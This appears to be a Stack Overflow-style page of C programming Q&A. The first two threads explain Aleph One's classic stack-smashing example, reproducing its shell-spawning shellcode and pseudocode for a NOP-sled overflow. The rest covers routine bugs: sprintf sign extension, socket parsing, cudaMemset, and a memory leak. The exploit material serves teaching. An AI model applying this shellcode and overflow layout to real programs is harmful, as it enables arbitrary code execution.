Understanding Aleph One's first buffer overflow exploit

I am reading "Smashing The Stack For Fun And Profit" by Aleph One, and reached this spot:
overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
Now, I understand the theory behind the exploit:
shellcode[] is in the data segment (which is writable) and contains the code to spawn a shell.
We would like to copy its contents into main's buffer and also overwrite main's return address with the address of the beginning of the buffer, so that execution is transferred to our shell-spawning code. We do this by copying the shellcode into the large_string[] buffer (second for loop), while the rest(???) of large_string[] contains the buffer's address (first for loop).
Of course, main's return address will be overwritten with this buffer's address, since we copy large_string[] to buffer[] (strcpy).
My problem is with the little details of the exploit:
1.)
Why does the first for loop run from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
2.)
What is strlen(shellcode)?
I would appreciate some clarification on these points.
Thanks!

1) Why does the first for loop run from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
It copies four bytes at a time: long_ptr is a long *, so long_ptr + i advances by i * sizeof(long) bytes. The code relies on sizeof(long) (and the size of a pointer) being 4 on the target platform, and 32 * 4 == 128, which is exactly the size of large_string[].
2) What is strlen(shellcode)?
It's the number of bytes in shellcode before the first \0 byte (this relies on the fact that the shellcode does not contain embedded \0 bytes).
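To make the arithmetic concrete, here is a minimal sketch, assuming a 4-byte word (uint32_t stands in for the 32-bit long of the original platform). The helper name fill_words and the address value used below are hypothetical and serve only as illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fill buf with as many whole copies of a 4-byte word as fit.
 * Returns the number of words written: buf_size / 4.
 * fill_words is a hypothetical helper, not part of the original exploit. */
size_t fill_words(unsigned char *buf, size_t buf_size, uint32_t word) {
    size_t count = buf_size / sizeof word;
    for (size_t i = 0; i < count; i++) {
        /* Same effect as *(ptr + i) = word, without alignment concerns. */
        memcpy(buf + i * sizeof word, &word, sizeof word);
    }
    return count;
}
```

For a 128-byte buffer the function writes 32 words, which is why the loop in the paper runs from 0 to 31. Similarly, strlen("abc\0def") is 3, because counting stops at the first \0 byte.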

Related

Avoid NUL Terminating Character for Stack Smashing with strcpy()

I have recently been following aleph1's Smashing The Stack For Fun And Profit paper, and I've reached a part where I am unable to smash the stack with strcpy.
In the chapter titled "Writing an Exploit (or how to mung the stack)", aleph1 writes the following code (which I tried to run on my computer):
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
What we have done above is filled the array large_string[] with the
address of buffer[], which is where our code will be. Then we copy our
shellcode into the beginning of the large_string string. strcpy() will then
copy large_string onto buffer without doing any bounds checking, and will
overflow the return address, overwriting it with the address where our code
is now located. Once we reach the end of main and it tried to return it
jumps to our code, and execs a shell.
This code works exactly as it's supposed to for me until it gets to this line:
strcpy(buffer,large_string);
After lots of digging around, I found out that strcpy doesn't overflow buffer as it should, because the address of buffer (which is copied many times into large_string) has NUL string-terminating zeros in it.
Therefore, strcpy() stops after the first NUL it runs into, which is well before we overwrite the return address of main with buffer's address.
Is there a way to solve this problem and somehow make the address of buffer not have any zeroes in it?
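The effect described here can be reproduced without touching the stack. The following is a rough sketch, assuming 32-bit little-endian addresses; both helper names and the two example addresses used in the note below are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns 1 if any of the four bytes of addr is zero, otherwise 0. */
int has_zero_byte(uint32_t addr) {
    for (int shift = 0; shift < 32; shift += 8) {
        if (((addr >> shift) & 0xffu) == 0)
            return 1;
    }
    return 0;
}

/* Fill a 128-byte string with little-endian copies of addr and report
 * how many bytes strcpy() would copy before it meets a terminator. */
size_t bytes_strcpy_would_copy(uint32_t addr) {
    unsigned char large_string[129];
    for (size_t i = 0; i < 128; i += 4) {
        large_string[i]     = (unsigned char)(addr & 0xffu);
        large_string[i + 1] = (unsigned char)((addr >> 8) & 0xffu);
        large_string[i + 2] = (unsigned char)((addr >> 16) & 0xffu);
        large_string[i + 3] = (unsigned char)((addr >> 24) & 0xffu);
    }
    large_string[128] = '\0'; /* guarantee termination for strlen */
    return strlen((const char *)large_string);
}
```

With a hypothetical address such as 0x0012ff40 the copy would stop after 3 bytes, while an address such as 0xbffff5a0, which has no zero byte, lets all 128 bytes through.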

I guess you are using Windows on a little-endian processor. As far as I know, 32-bit Linux places the stack at high addresses, so a stack address usually does not contain a NUL byte, whereas Windows places it at low addresses, so the most significant byte of the address is zero. The trick is to pad your shellcode with enough NOP instructions that the padded shellcode reaches exactly up to the return address. Because your address contains a NUL byte, you can write the return address only once (strcpy stops at the NUL byte). To do this, look at the assembly, calculate the exact number of bytes between buffer and the return address, and put the target return address right after them.
Here is the pseudocode:
// &ret_addr is the address where the target return address is stored.
// To get it:
// view in debugger
// break at first instruction in main. Usually push ebp instruction
// look ESP register value
a = &ret_addr - &buffer // [NOP] + [SHELLCODE]
// fill large_string with return address
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
// fill large_string with NOP
n = a - strlen(shellcode)
for (i = 0; i < n; i++)
large_string[i] = NOP;
// fill large_string with your shellcode
for (i = 0; i < strlen(shellcode); i++)
large_string[n+i] = shellcode[i];
At the end large_string will look like this
[n bytes] [strlen(shellcode) bytes] [Rest Bytes]
[NOP] [SHELLCODE] [RETURN ADDRESS]
and buffer will look like this
[n bytes] [strlen(shellcode) bytes] [4 Bytes]
[NOP] [SHELLCODE] [RETURN ADDRESS]
Remember that this works only if the NX bit and stack canaries are turned off. Try it in a debugger to understand it properly.
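The layout above can be sketched as a plain buffer-building function that only arranges bytes and never executes anything. This is a minimal illustration, assuming a 32-bit little-endian address; build_layout, NOP_BYTE and the parameter names are hypothetical, and distance corresponds to a = &ret_addr - &buffer in the pseudocode.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NOP_BYTE 0x90 /* x86 NOP opcode */

/* Writes [NOP padding][payload][4-byte little-endian address] into out.
 * distance is the number of bytes between the start of the buffer and
 * the slot that receives the address. Returns the total number of bytes
 * written, or 0 if the arguments do not fit. */
size_t build_layout(unsigned char *out, size_t out_size, size_t distance,
                    const unsigned char *payload, size_t payload_len,
                    uint32_t addr) {
    if (payload_len > distance || out_size < 4 || distance > out_size - 4)
        return 0;
    size_t n = distance - payload_len;      /* n = a - strlen(shellcode) */
    memset(out, NOP_BYTE, n);               /* [NOP]            */
    memcpy(out + n, payload, payload_len);  /* [SHELLCODE]      */
    for (size_t i = 0; i < 4; i++)          /* [RETURN ADDRESS] */
        out[distance + i] = (unsigned char)((addr >> (8 * i)) & 0xffu);
    return distance + 4;
}
```

Because the address is stored least significant byte first, a zero most significant byte ends up last, which is where strcpy would stop anyway.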

Buffer overrun issue reported by static code analysis tool

My piece of code:
void temp(char *source)
{
char dest[41];
for(int i = 0; i < 20; i++)
{
sprintf(&dest[i*2], "%02x", (unsigned int)source[i]);
}
}
When I run the static code analysis tool, I get the warning below:
On 19th iteration of the loop : This code could write past the end of the buffer pointed to by &dest[i * 2]. &dest[i * 2] evaluates to [dest + 38]. sprintf() writes up to 9 bytes starting at offset 38 from the beginning of the buffer pointed to by &dest[i * 2], whose capacity is 41 bytes. The number of bytes written could exceed the number of allocated bytes beyond that offset. The overrun occurs in stack memory.
My question is: since in every loop iteration, we are only copying 2 bytes (considering size of unsigned int on the machine is 2 bytes) from source to destination, where is the possibility of copying 9 bytes on the last iteration?

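char can be signed, and it is by default with x86 compilers. When source[i] is negative, the cast to unsigned int sign-extends it, so "%02x" prints eight hex digits instead of two; together with the terminating '\0' those are the 9 bytes the tool reports. On my computer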
#include <stdio.h>
int main(void) {
printf("%02x\n", (unsigned int)(char)128);
}
prints ffffff80.
What you want is the format "%02hhx" with the argument (unsigned char)source[i].
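A possible bounds-checked version of the loop, as a sketch: hex_encode and naive_hex_width are hypothetical names, and the width of 8 reported by the naive variant assumes a 32-bit unsigned int.

```c
#include <stddef.h>
#include <stdio.h>

/* Number of characters "%02x" produces when a (possibly negative)
 * char value is converted straight to unsigned int. */
int naive_hex_width(signed char c) {
    return snprintf(NULL, 0, "%02x", (unsigned int)c);
}

/* Hex-encode n bytes of src into dest (2 characters per byte plus '\0').
 * Returns 0 on success, -1 if dest is too small. */
int hex_encode(const char *src, size_t n, char *dest, size_t dest_size) {
    if (dest_size == 0 || n > (dest_size - 1) / 2)
        return -1;
    dest[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        /* Going through unsigned char keeps the value in 0..255,
         * so exactly two hex digits are produced. */
        snprintf(dest + 2 * i, 3, "%02x", (unsigned int)(unsigned char)src[i]);
    }
    return 0;
}
```

Calling hex_encode(source, 20, dest, sizeof dest) with dest[41] fills the buffer exactly: 40 hex digits plus the terminator.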

Parse single message coming over socket containing 2 strings in C

I'm trying to read a message that contains 2 strings, which could be anything. It is sent over a socket.
Note that I'm using C in Ubuntu environment.
The format of the message is, in a single void* buffer:
[string1]\0[string2]\0
I figured I'd be able to separate them once they arrive, using the '\0' to figure out where to split them. I'm using a function to read just the string and it sort of works, but I keep getting complaints from Valgrind, and I don't understand why.
I'm going to use an example where only 1 string is read from the buffer, but I mention the strategy because I'm not able to just put the message into a char* buffer. I need the function to extract a string from more complex buffers.
It all starts like this:
void* buffer = malloc(msgSize * sizeof(char)); //the message size is properly calculated to include the '\0' at the end
char* instanceId = malloc(msgSize * sizeof(char));
if(recv(socket_desc, (void*) buffer, msgSize * sizeof(char), MSG_WAITALL) <= 0) {
log_error(logger, "Message failed.");
return;
}
bufferToString(buffer, &instanceId, 0);
bufferToString2(buffer, instanceId, 0);
I made several attempts to make bufferToString work, as you can see... Of course I don't invoke them all at the same time, but I want to share those lines in case I'm making a mistake there.
Attempt 1: char by char
int bufferToString(void* buffer, char** string, int startPtr) {
//startPtr can be used to read strings that are in the middle of a buffer
char a;
int thisStringPtr = 0;
do {
a = *(char*) (buffer + startPtr);
(*string)[thisStringPtr] = a;
startPtr++;
thisStringPtr++;
} while (a != '\0');
return startPtr; //return end position to use for extracting more values later
}
This one complains:
==23047== Invalid read of size 1
==23047== at 0x403A27A: bufferToString (buffer.c:16)
==23047== by 0x804A0C2: handleHiloInstancia (coordinador.c:232)
==23047== by 0x8049C54: procesarConexion (coordinador.c:85)
==23047== by 0x4066294: start_thread (pthread_create.c:333)
==23047== by 0x41650AD: clone (clone.S:114)
==23047== Address 0x423bc8a is 0 bytes after a block of size 10 alloc'd
==23047== at 0x402C17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==23047== by 0x804A063: handleHiloInstancia (coordinador.c:225)
==23047== by 0x8049C54: procesarConexion (coordinador.c:85)
==23047== by 0x4066294: start_thread (pthread_create.c:333)
==23047== by 0x41650AD: clone (clone.S:114)
Line 16 of bufferToString is the first line inside the do statement.
Attempt 2: cast and copy
int bufferToString2(void* buffer, char* string, int startPtr) {
strcpy(string, (char*) (buffer + startPtr));
return (strlen(string) + 1)*sizeof(char);
}
With or without the +startPtr, this causes slightly different problems:
==23190== Invalid read of size 1
==23190== at 0x402F489: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==23190== by 0x403A1E3: bufferToString2 (buffer.c:3)
==23190== by 0x804A0C1: handleHiloInstancia (coordinador.c:232)
==23190== by 0x8049C54: procesarConexion (coordinador.c:85)
==23190== by 0x4066294: start_thread (pthread_create.c:333)
==23190== by 0x41650AD: clone (clone.S:114)
==23190== Address 0x423bc8a is 0 bytes after a block of size 10 alloc'd
I tried a few other combinations (like using char** string and all the required modifications in bufferToString2), but I keep getting similar error messages. What am I not seeing?
UPDATE: How message is being sent:
int bufferSize;
void* buffer = serializePackage(HANDSHAKE_INSTANCE_ID ,instancia_config->nombre, &bufferSize );
printf("Buffer size: %i - Instancia Name = %s - Socket num: %i\n", bufferSize, instancia_config->nombre, socket_coordinador); //this shows right data
if (send(socket_coordinador,buffer,bufferSize, 0) <= 0) {
log_error(logger, "Could not send ID.");
endProcess(EXIT_FAILURE);
}
instancia_config->nombre is of type char*
void* serializePackage(int codigo,char * mensaje, int* tamanioPaquete){
int puntero = 0;
int length = strlen(mensaje);
int sizeOfPaquete = strlen(mensaje) * sizeof(char) + 1 + 2 * sizeof(int);
void * paquete = malloc(sizeOfPaquete);
memcpy((paquete + puntero) ,&codigo,sizeof(int));
puntero += sizeof(int);
memcpy((paquete + puntero),&length,sizeof(int));
puntero += sizeof(int);
memcpy((paquete + puntero),mensaje,length * sizeof(char) + 1);
*tamanioPaquete = sizeOfPaquete;
return paquete;
}

Do you have your src and dst the right way around?
The destination (or target if you prefer) of memory services in C is the first parameter, so:
strcpy(string, buffer)
will copy buffer into string. (https://www.tutorialspoint.com/c_standard_library/c_function_strcpy.htm)
But: bufferToString2 is being called with buffer as the first parameter (and it's the source in this case).
In the first case, as was pointed out, you can't do arithmetic on a void* in standard C (GCC accepts it as an extension and treats the element size as 1) because the math is trying to go to the Nth element if you say:
*(x + N)
and if x is 'void' it has no size, and therefore the Nth element isn't meaningful.

Since no answer has solved the problem so far, and there has been no further progress on this question, I will summarize what I partially mentioned in my comments, to at least provide hints on where to start looking for the problem:
Unfortunately, a lot of the information needed to treat this question seriously is missing.
For example, which kind of socket do you use to send / receive your messages?
Is it a pipe, or a network socket - which kind of transport do you use then?
How do you ensure that you received the entire message?
You should at least check the return value of recv (which happens to be the number of received octets) and check with the expected length if there is one.
After receiving your message, dump it as is. If you are not familiar with using a debugger, a function like this would do as a starter:
void dump(const char* buffer, size_t length) {
for(size_t i = 0; i < length; ++i) {
printf("%02x ", buffer[i] & 0xff); /* two digits per byte, space-separated */
}
printf("\n");
}
and invoke it in your code after the ssize_t received = recv(...) like dump(buffer, received).
Furthermore, you don't show how you calculate msgSize in your first code snippet. How do you guarantee that the string in mensaje you pass to serializePackage is not longer than msgSize?
Then, in serializePackage, you create a buffer filled like this:
| codigo (int) | length (int) | mensaje (+ terminating zero) |
but what you read back at the other end is just a C string. You ought to read the 2 ints as well, ought you not?
Then there is another problem with this serialization: even if you read back the 2 ints, the code is entirely unportable and works only if both sender and receiver run on architectures that represent ints in precisely the same way, with the same width and the same byte order. If, for example, the sender's int is 4 bytes wide and the receiver's is 8, you write 4-byte integers but attempt to read back 8-byte integers. Better use types with precisely defined width (like uint32_t from inttypes.h) and explicitly convert to/from network byte order using e.g. ntohl(3) / htonl(3).
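As an illustration of the fixed-width idea, here is a small sketch that writes and reads a 32-bit value in network (big-endian) byte order by hand. The helper names put_u32_be and get_u32_be are hypothetical; htonl/ntohl combined with memcpy would be the more conventional route on POSIX systems.

```c
#include <stdint.h>

/* Store v into out[0..3], most significant byte first. */
void put_u32_be(unsigned char *out, uint32_t v) {
    out[0] = (unsigned char)(v >> 24);
    out[1] = (unsigned char)(v >> 16);
    out[2] = (unsigned char)(v >> 8);
    out[3] = (unsigned char)v;
}

/* Read back a value written by put_u32_be. */
uint32_t get_u32_be(const unsigned char *in) {
    return ((uint32_t)in[0] << 24) |
           ((uint32_t)in[1] << 16) |
           ((uint32_t)in[2] << 8)  |
            (uint32_t)in[3];
}
```

Both sides then agree on 4 bytes per header field regardless of their native int size or endianness.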
Lastly, I want to add some remarks to improve the quality of code, that might prevent a lot of potential errors:
Take as example your bufferToString:
You passed in string as char** - why?
Use appropriate data types: don't use a signed int where you deal with non-negative sizes; use the standard type size_t instead.
Don't use void* as a type unless really necessary, because you lose a lot of compile-time error checking. C automatically converts to and from void* in assignments, so declaring buffer as char* is highly recommended.
This function, for example, can be greatly simplified:
size_t bufferToString(const char* buffer, char* string, size_t offset) {
size_t i = 0;
/* copy up to, but not including, the terminator */
for(; 0 != buffer[offset + i]; ++i) {
string[i] = buffer[offset + i];
}
string[i] = 0; /* terminate the copy */
return offset + i + 1; /* position just past the terminator */
}
I can only emphasize that network code tends to be hard to debug: there are all kinds of external error sources you cannot really oversee.
Hopefully these hints help to track down the root cause of your problem.
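To tie the hints together, here is one way a bounds-checked extraction could look. It is a sketch under the assumption that the caller knows how many bytes were actually received; extract_string and its parameters are hypothetical names.

```c
#include <stddef.h>
#include <string.h>

/* Copy the NUL-terminated string starting at buffer[offset] into out.
 * buffer_len is the number of valid bytes in buffer (e.g. the value
 * returned by recv). Returns the offset just past the terminator,
 * or 0 if no complete string fits inside the given bounds. */
size_t extract_string(const char *buffer, size_t buffer_len, size_t offset,
                      char *out, size_t out_size) {
    if (offset >= buffer_len)
        return 0;
    const char *start = buffer + offset;
    const char *end = memchr(start, '\0', buffer_len - offset);
    if (end == NULL)
        return 0; /* terminator missing from the received data */
    size_t len = (size_t)(end - start);
    if (len + 1 > out_size)
        return 0; /* destination too small */
    memcpy(out, start, len + 1);
    return offset + len + 1;
}
```

Because memchr never looks past buffer_len, a message that arrives without its terminator is reported as an error instead of causing a read beyond the allocated block. For the [string1]\0[string2]\0 format, the return value of the first call is the offset to pass to the second.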

Strange behaviour of an elementary CUDA code.

I am having trouble understanding the output of the following simple CUDA code. All that the code does is allocate two integer arrays: one on the host and one on the device each of size 16. It then sets the device array elements to the integer value 3 and then copies these values into the host_array where all the elements are then printed out.
#include <stdlib.h>
#include <stdio.h>
int main(void)
{
int num_elements = 16;
int num_bytes = num_elements * sizeof(int);
int *device_array = 0;
int *host_array = 0;
// malloc host memory
host_array = (int*)malloc(num_bytes);
// cudaMalloc device memory
cudaMalloc((void**)&device_array, num_bytes);
// Constant out the device array with cudaMemset
cudaMemset(device_array, 3, num_bytes);
// copy the contents of the device array to the host
cudaMemcpy(host_array, device_array, num_bytes, cudaMemcpyDeviceToHost);
// print out the result element by element
for(int i = 0; i < num_elements; ++i)
printf("%i\n", *(host_array+i));
// use free to deallocate the host array
free(host_array);
// use cudaFree to deallocate the device array
cudaFree(device_array);
return 0;
}
The output of this program is 50529027 printed line by line 16 times.
50529027
50529027
50529027
..
..
..
50529027
50529027
Where did this number come from? When I replace 3 with 0 in the cudaMemset call then I get correct behaviour. i.e.
0 printed line by line 16 times.
I compiled the code with nvcc test.cu on Ubuntu 10.10 with CUDA 4.0

I'm no cuda expert but 50529027 is 0x03030303 in hex. This means cudaMemset sets each byte in the array to 3 and not each int. This is not surprising given the signature of cuda memset (to pass in the number of bytes to set) and the general semantics of memset operations.
Edit: As to your (I guess) implicit question of how to achieve what you intended I think you have to write a loop and initialize each array element.
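The arithmetic can be checked on the host with plain C. This is a sketch with hypothetical helper names, assuming a 4-byte int as in the question; on the device the per-element loop would have to run in a kernel, or on a host array that is then copied over with cudaMemcpy.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Value of a 32-bit word after memset() has set each of its bytes. */
uint32_t memset_pattern(unsigned char byte) {
    uint32_t word;
    memset(&word, byte, sizeof word);
    return word;
}

/* Element-wise fill: what the question actually intended. */
void fill_ints(int *array, size_t count, int value) {
    for (size_t i = 0; i < count; i++)
        array[i] = value;
}
```

memset_pattern(3) yields 0x03030303, that is 3 * 16777216 + 3 * 65536 + 3 * 256 + 3 = 50529027, the number printed by the program.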

As others have pointed out, cudaMemset works like the standard C memset: it sets byte values. From the CUDA documentation:
cudaError_t cudaMemset( void * devPtr, int value, size_t count)
Fills the first count bytes of the memory area pointed to by devPtr
with the constant byte value value.
If you want to set word size values, the best solution is to use your own memset kernel, perhaps something like this:
template<typename T>
__global__ void myMemset(T * x, T value, size_t count )
{
size_t tid = threadIdx.x + blockIdx.x * blockDim.x;
size_t stride = blockDim.x * gridDim.x;
for(size_t i=tid; i<count; i+=stride) {
x[i] = value;
}
}
which could be launched with enough blocks to cover the number of multiprocessors (MP) in your GPU; each thread will then do as many iterations as required to fill the memory allocation. Writes will be coalesced, so performance shouldn't be too bad. This could also be adapted to CUDA's vector types, if you so desired.

memset sets bytes, and an int is 4 bytes, so what you get is 50529027 decimal, which is 0x03030303 in hex. In other words, you are using it wrong, and it has nothing to do with CUDA.

This is a classic memset pitfall: it writes individual bytes, so it produces the value you expect only for 8-bit types such as char. Here it sets every byte of the memory to 3. You can confirm this with a simple C++ program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main ()
{
int x=16;
size_t bytes = x*sizeof(int);
int *M = (int*)malloc(bytes);
memset(M,3,bytes);
for (int i = 0; i < x; ++i) {
printf("%d\n", M[i]);
}
free(M);
return 0;
}
For multi-byte types, memset gives the expected result only when every byte of the desired value is identical, the usual case being 0 (it sets every byte to 0 and hence all data to 0). If you change the data type to char, you'll see the desired output. cudaMemset behaves exactly like memset; the only difference is that it takes a GPU pointer as input.
So memset or cudaMemset sets every byte of the memory region whose size is given by the third argument to the value passed (in your case 3), regardless of the data type.
Tip:
Google: 50529027 in binary and you'll get the answer :)

Memory loss in following code when the CPU is 32 bit processor

I have a function to convert an integer to a string. The function is
char * Int_String(int Number)
{
char* result;
NAT size = 1;
if (Number > 9) {
size = (NAT)log10((double) Number) + 1;
} else if (Number < 0) {
size = (NAT)log10((double) abs(Number)) + 2; /* including '-' */
}
size++; /* for '\0' */
result = (char *) memory_Malloc(sizeof(char) * size);
sprintf(result, "%d", Number);
return result;
}
NAT is typedef unsigned int
Number is int
I am using this function in the following manner
char *s2;
char **Connections;
Connections = memory_Malloc(nc*sizeof(char*));
char con[]="c_";
k1=1;
for (i=0; i<nc ; i++){
s2 = Int_ToString(k1);
Connections[i]= string_Conc(con,s2);
string_StringFree(s2);
k1= k1+1;
}
And the function char* string_Conc(const char *s1, const char *s2) is
{
char* dst;
dst = memory_Malloc(strlen(s1) + strlen(s2) + 1);
strcpy(dst, s1);
return strcat(dst,s2);
}
I am using following methods to free its memory:
for(i=0; i<nc; i++){
memory_Free(Connections[i],sizeof(char));
}
memory_Free(Connections,nc*sizeof(char*));
The problem I am getting is: I can free all the allocated memory when nc<=9. But when it is >=10, it leaks memory in multiples of 4 bytes with each increase in the number. How can I fix the problem? Any help will be appreciated.
EDIT
void memory_Free(POINTER Freepointer, unsigned int Size)
Thanks,
thetna

You don't show the implementation of memory_Free (nor memory_Malloc), so we don't know why you need to pass the supposed size of the memory block to be freed as a 2nd parameter (the standard free() doesn't need this). However, here
memory_Free(Connections[i],sizeof(char));
it is certainly wrong: sizeof(char) is 1 by definition, but the size of the allocated block is at least 4 bytes for each string in the array (as the strings contain "c_" plus at least one digit plus the terminating '\0').
Update
Looking through the source code you linked, this indeed seems to be the cause of your problem! The code inside memory_Free seems to align memory block sizes, I assume to 4-byte boundaries, which is very common. In this case, if the passed Size is 1, it happens to be corrected to 4, which is exactly the right value for single-digit numbers as shown above! However, numbers greater than 9 are converted to (at least) two digits, thus the size of the converted string is already 5. A block of 5 bytes is most probably allocated as an aligned block of 8 bytes under the hood, but since memory_Free is always called with a Size of 1, it always frees only 4 bytes. This leaves 4 bytes leaking for each number above 9, precisely as you described in your comment above!
To fix this, you need to modify the line above to
memory_Free(Connections[i], strlen(Connections[i]) + 1);
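The size arithmetic behind this explanation can be sketched as follows. The 4-byte rounding is the assumption made in the answer, not a confirmed property of memory_Malloc/memory_Free, and all three helper names are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>

/* Round size up to the next multiple of 4 (assumed allocator granularity). */
size_t round_up4(size_t size) {
    return (size + 3) & ~(size_t)3;
}

/* Bytes needed to store "c_<k>" including the terminating '\0'. */
size_t connection_size(int k) {
    int len = snprintf(NULL, 0, "c_%d", k);
    return len < 0 ? 0 : (size_t)len + 1;
}

/* Bytes left behind when a block of `allocated` bytes is released
 * with a claimed size of `claimed` bytes. */
size_t leaked_bytes(size_t allocated, size_t claimed) {
    return round_up4(allocated) - round_up4(claimed);
}
```

For k = 9 the string "c_9" needs 4 bytes and nothing leaks when the claimed size is 1; for k = 10 the string needs 5 bytes, the block is rounded to 8, and 4 bytes remain unreleased. Passing strlen(Connections[i]) + 1 makes the claimed size match the allocation.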
